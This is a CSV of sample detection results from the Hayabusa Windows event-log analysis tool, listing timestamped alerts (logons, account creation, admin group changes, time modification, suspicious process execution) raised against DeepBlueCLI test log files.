hayabusa/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.csv

Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath
2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser  :  SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser  :  SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3463664321-2923530833-3546627382-1000  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: -  :  SID: S-1-5-21-3463664321-2923530833-3546627382-1000  :  Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: WIN-QALA5Q3KJ43  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x298c5  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: WIN-QALA5Q3KJ43  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x29908  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:47.140 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:32:53.796 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:35:55.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x57d5b  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x57d8d  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x57d5b,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x57d8d,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:49:38.890 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27f43  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x27f73  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x27f43,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:53:48.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:48:37.144 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 03:49:28.191 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x27f73,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:09.406 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:05:59.484 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:10:27.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:23.812 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:22:39.125 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:25:30.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x39a20  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x39a67  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x39a20,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x39a67,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:30.093 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x24902  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
